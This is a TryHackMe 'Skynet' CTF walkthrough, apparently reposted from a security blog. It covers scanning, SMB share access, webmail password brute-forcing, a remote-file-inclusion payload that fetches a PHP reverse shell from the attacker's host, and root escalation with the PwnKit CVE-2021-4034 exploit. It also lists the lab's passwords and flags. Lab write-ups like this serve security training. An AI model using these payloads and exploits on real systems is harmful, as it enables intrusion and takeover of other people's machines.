Skynet — TryHackMe Room Simple Writeup | 2023
2023-5-10 02:38:25 Author: infosecwriteups.com(查看原文) 阅读量:20 收藏

A vulnerable Terminator-themed Linux machine | TryHackme Room Simple Writeup | Karthikeyan Nagaraj

Karthikeyan Nagaraj

InfoSec Write-ups

Nmap:

$ nmap -sC -sV <MACHINE_IP>

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet

110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL CAPA RESP-CODES TOP

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login more listed have capabilities ID LITERAL+ LOGINDISABLEDA0001 IDLE LOGIN-REFERRALS OK Pre-login ENABLE SASL-IR

445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2023-05-07T05:07:19
|_ start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-05-07T00:07:19-05:00

Gobuster:

└─$ gobuster dir -u http://10.10.71.82/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================

[+] Url: http://10.10.71.82/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s

===============================================================
Starting gobuster in directory enumeration mode
===============================================================

/admin (Status: 301) [Size: 310] [--> http://10.10.71.82/admin/]
/ai (Status: 301) [Size: 307] [--> http://10.10.71.82/ai/]
/config (Status: 301) [Size: 311] [--> http://10.10.71.82/config/]
/squirrelmail (Status: 301) [Size: 317] [--> http://10.10.71.82/squirrelmail/]
/css (Status: 301) [Size: 308] [--> http://10.10.71.82/css/]
/js (Status: 301) [Size: 307] [--> http://10.10.71.82/js/]

===============================================================
2023/05/07 11:25:45 Finished
===============================================================

Enum4 Linux:

1. What is Miles password for his emails?

  • First login to the Anonymous share with No Password
  • We found a File and a Directory so Let’s the Files using get <FileName>
  • Now Let’s cd into logs and Download all Files
Attention.txt
log1.txt
log2.txt and log3.txt Contents

We Have Found a List of Passwords in log1.txt So Let's use the file of passwords to Bruteforce the login /squirrelmai using Burpsuite

  1. Capture the request through burp
  2. Send it to Intruder and use Sniper as attack type
  3. Move to payloads and add the password list or Copy paste it
1
2
3

We Found a Redirect to Webmail.php which seems to be Interesting, so copy and paste the password into the login field

Voila!! We Found the Password : )

Ans: cyborg007haloterminator

2. What is the hidden directory?

  1. On Opening the below mail, we found a password
1st Mail
2nd Mail

I Used Rapid Tables to Decrypt the Message

3rd Mail

2. We got the password so let’s log in to /milesdyson share with the username milesdyson and Password we Found in the Mail )s{A&2Z=F^n_E.B`

We are In, Now let’s explore!!

$ smbclient //10.10.71.82/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.

smb: \> ls
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019

smb: \> cd notes

smb: \notes\> ls
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
====> important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:31:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:31:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:31:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:31:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:31:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:31:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:31:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:31:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:31:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:31:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:31:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:31:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:31:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:31:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:31:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:31:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:31:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:31:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:31:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:31:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:31:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:31:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:31:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:31:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:31:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:31:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:31:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019

9204224 blocks of size 1024. 5819264 blocks available

We found a File Called Information.txt which the hidden Directory

Ans: /45kra24zxs28v3yd

3. What is the vulnerability called when you can include a remote file for malicious purposes?

Ans: Remote File Inclusion

4. What is the user flag?

Now we found the Hidden Directory so let’s try to brute-force further with Goubuster

gobuster dir -u http://<Machine-IP>/45kra24zxs28v3yd -w <Wordlist-Location> 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.223.209/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 418]
/administrator (Status: 301) [Size: 333] [--> http://10.10.223.209/45kra24zxs28v3yd/administrator/]

===============================================================
Finished
===============================================================

On /Administrator

On googling about this, we found a File Inclusion Vulnerability

Exploit:

For this, we can run Simple python server to upload a reverse shell

  1. Download the Reverse Shell file and move it to /var/www/html directory or your /home directory with the file name as php_reverse_shell.php and make sure to add your system IP and port 4444 inside the reverse_shell File
  2. Now let’s start python’s http Server

3. Start a Reverse Listener using netcat with the port you used on reverse shell

4. Now Let’s execute the below Payload

http://<Machine_IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<Your-System-IP>/php_reverse_shell.php

We got the reverse shell, cd /home and cat user.txt

Ans: 7ce5c2109a40f958099283600a9ae807

5. What is the root flag?

First let’s make the terminal Interactive using Python!

python3 -c "import pty;pty.spawn('/bin/bash')"
  1. Download the Linpeas File on your machine and move it to /var/www/html or your /home directory
  2. Now let’s download the file on the target machine using wget

3. Now let’s change the file permission then Execute the File!!

Let’s download the files and move it to the target machine!!

git clone https://github.com/berdav/CVE-2021-4034
zip exploit CVE-2021-4034 -r

Move the zip files to /var/home/www/ or /home then download it on the target machine using wget

cd CVE-2021-4034
make
./cve-2021–4034
cd /root
cat root.txt
Ans: 3f0372db24753accc7179a282cd6a949

文章来源: https://infosecwriteups.com/skynet-tryhackme-room-simple-writeup-2023-4dbda93fe756?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh